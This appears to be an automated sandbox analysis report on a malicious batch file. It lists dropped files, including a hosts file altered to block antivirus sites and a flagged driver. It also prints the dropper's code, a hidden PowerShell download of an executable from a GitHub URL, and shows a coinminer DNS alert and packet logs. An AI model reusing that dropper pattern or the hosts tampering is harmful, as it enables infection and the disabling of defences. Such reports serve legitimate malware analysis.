Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Windows\System32\drivers\etc\hosts

Download File

Process:	C:\Users\user\AppData\Local\Temp\1348.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	935
Entropy (8bit):	4.748708890934076
Encrypted:	false
SSDEEP:	24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTtR:vDZhyoZWM9rU5fFcG
MD5:	BAF573F5B1C377B9D10ECC51CE0C0BFB
SHA1:	63199BFF9169ACA2303535EBA4AA6410D28C6AB3
SHA-256:	8EDB59CE85F326F243B3957C6F85F0764453A47075BC863A88BFAD63B6F9526E
SHA-512:	EA544CC1FE15A46C5DABE9CD845D2F2AE50AB6EB14EE6B676F5249D3D5F6E7D946934204693723749DE2D0A2B8AB8F4EB71AD63B51F8A81AA9E32683C664AB8B
Malicious:	true
Preview:	# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 https://www.drweb.ru/..0.0.0.0 https://www.kaspersky.ru/downloads/free-virus-removal-tool

C:\Windows\Temp\__PSScriptPolicyTest_0smp4f3y.ej3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_45z5hu4h.4sj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_inkywt32.aux.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_np5tl1ul.ulz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\lhaqmlexwhjs.sys

Download File

Process:	C:\ProgramData\Chrome.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: Google Chrome.exe, Detection: malicious, Browse Filename: e7WMhx18XN.exe, Detection: malicious, Browse Filename: GcqJPBLD2Q.exe, Detection: malicious, Browse Filename: C5Lg2JSPlD.exe, Detection: malicious, Browse Filename: TwrhjEKqxk.exe, Detection: malicious, Browse Filename: aA45th2ixY.exe, Detection: malicious, Browse Filename: 1mqzOM6eok.exe, Detection: malicious, Browse Filename: updater.exe, Detection: malicious, Browse Filename: 7QiAmg58Jk.exe, Detection: malicious, Browse Filename: LnK0dS8jcA.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
Entropy (8bit):	5.4850506084570725
TrID:
File name:	eshkere.bat
File size:	440 bytes
MD5:	ae8361d48c8131bc78d0be59c8c95515
SHA1:	c3bc638c0556a66b4d98d56219e44adb2353235b
SHA256:	70ed9e7f429794334f660a314728f835421a8e203f55fd0a5ed3fde08967bebb
SHA512:	8e4502109581ac2dbbf1c21da44c9a0d0975979742af44f44d3aac9a200ed97aa6d9cc8ecc7c65c0786f480b6dd20b0cb77e43120d4c42494ea98cb67b4ca722
SSDEEP:	12:wDeOvi5BmV981k77WARm0NfQVWZV72T981kUM4TQdi:wSOZ7yABr7ODa
TLSH:	13F05C561A49BA2D8F325FA14575D1016A8F23402362D28F359D9838BE1144543CD4DD
File Content Preview:	@echo off..set url=https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe..set tempPath=%TEMP%..set filePath=%tempPath%\%RANDOM%.exe....powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('%url%', '%filePath%')

File Icon


Icon Hash:	9686878b929a9886

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-08T14:02:44.743380+0200	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	2	192.168.2.9	60174	1.1.1.1	53	UDP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 14:02:22.412178993 CEST	49706	443	192.168.2.9	140.82.121.4
Oct 8, 2024 14:02:22.412245035 CEST	443	49706	140.82.121.4	192.168.2.9
Oct 8, 2024 14:02:22.412327051 CEST	49706	443	192.168.2.9	140.82.121.4
Oct 8, 2024 14:02:22.422061920 CEST	49706	443	192.168.2.9	140.82.121.4
Oct 8, 2024 14:02:22.422077894 CEST	443	49706	140.82.121.4	192.168.2.9
Oct 8, 2024 14:02:23.072796106 CEST	443	49706	140.82.121.4	192.168.2.9
Oct 8, 2024 14:02:23.073002100 CEST	49706	443	192.168.2.9	140.82.121.4
Oct 8, 2024 14:02:23.075737000 CEST	49706	443	192.168.2.9	140.82.121.4
Oct 8, 2024 14:02:23.075747967 CEST	443	49706	140.82.121.4	192.168.2.9
Oct 8, 2024 14:02:23.076097965 CEST	443	49706	140.82.121.4	192.168.2.9
Oct 8, 2024 14:02:23.105671883 CEST	49706	443	192.168.2.9	140.82.121.4
Oct 8, 2024 14:02:23.151396036 CEST	443	49706	140.82.121.4	192.168.2.9
Oct 8, 2024 14:02:23.577830076 CEST	443	49706	140.82.121.4	192.168.2.9
Oct 8, 2024 14:02:23.577980995 CEST	443	49706	140.82.121.4	192.168.2.9
Oct 8, 2024 14:02:23.578041077 CEST	49706	443	192.168.2.9	140.82.121.4
Oct 8, 2024 14:02:23.578063965 CEST	443	49706	140.82.121.4	192.168.2.9
Oct 8, 2024 14:02:23.578135967 CEST	49706	443	192.168.2.9	140.82.121.4
Oct 8, 2024 14:02:23.581636906 CEST	49706	443	192.168.2.9	140.82.121.4
Oct 8, 2024 14:02:23.591293097 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:23.591351032 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:23.591547966 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:23.592060089 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:23.592082024 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.059184074 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.059350967 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.062513113 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.062524080 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.062932968 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.063925982 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.111411095 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.343606949 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.343717098 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.343754053 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.343776941 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.343802929 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.343848944 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.343852997 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.343864918 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.343916893 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.351305962 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.351660967 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.351701021 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.351737976 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.351746082 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.351759911 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.351821899 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.400206089 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.400244951 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.441512108 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.441536903 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.441580057 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.441632986 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.441660881 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.441673994 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.441735029 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.441735029 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.443955898 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.443979979 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.444039106 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.444047928 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.444112062 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.444125891 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.499121904 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.526838064 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.526859999 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.526905060 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.526925087 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.526954889 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.526979923 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.527031898 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.527048111 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.528420925 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.528444052 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.528489113 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.528492928 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.528523922 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.528533936 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.528559923 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.528580904 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.529989958 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.530035019 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.530071020 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.530080080 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.530121088 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.530131102 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.574768066 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.574862003 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.574907064 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.574920893 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.574954987 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.574975014 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.626669884 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.626703024 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.626768112 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.626784086 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.626813889 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.626832008 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.628441095 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.628460884 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.628525972 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.628535032 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.628593922 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.629571915 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.629595041 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.629642963 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.629654884 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.629679918 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.629698992 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.631546974 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.631577015 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.631645918 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.631654978 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.631686926 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.631706953 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.633330107 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.633349895 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.633426905 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.633436918 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.633485079 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.634316921 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.634336948 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.634407997 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.634417057 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.634459019 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.661789894 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.661815882 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.661881924 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.661894083 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.661923885 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.661947966 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.699888945 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.699913979 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.700004101 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.700012922 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.700056076 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.700076103 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.700083971 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.700103045 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.700118065 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.700159073 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.700649023 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.700675964 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.700721025 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.700728893 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.700742006 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.700769901 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.703187943 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.703255892 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.703274965 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.703305960 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.703319073 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.703355074 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.704668999 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.704744101 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.704744101 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.704771042 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.704826117 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.704838037 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.705033064 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.705080032 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.705116034 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.705125093 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.705142975 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.705167055 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.705555916 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.705598116 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.705627918 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.705637932 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.705677032 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.705698967 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.787185907 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.787237883 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.787446976 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.787463903 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.787497997 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.787532091 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.787554979 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.787602901 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.787614107 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.787657976 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.787674904 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.787691116 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.787710905 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.787771940 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.787781000 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.787807941 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.787844896 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.788017988 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.788059950 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.788089037 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.788098097 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.788122892 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.788145065 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.790818930 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.790889025 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.790915012 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.790935993 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.790952921 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.790981054 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.791455984 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.791501045 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.791546106 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.791554928 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.791591883 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.791615009 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.791743040 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.791786909 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.791846991 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.791866064 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.791873932 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.791910887 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.791961908 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.792006016 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.792032957 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.792042971 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.792087078 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.835639000 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.835730076 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.835834980 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.835851908 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.835949898 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.873590946 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.873676062 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.873713970 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.873724937 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.873774052 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.873786926 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.873908043 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.873959064 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.873991966 CEST	49707	443	192.168.2.9	185.199.109.133
Oct 8, 2024 14:02:24.874000072 CEST	443	49707	185.199.109.133	192.168.2.9
Oct 8, 2024 14:02:24.874026060 CEST	49707	443	192.168.2.9	185.199.109.133
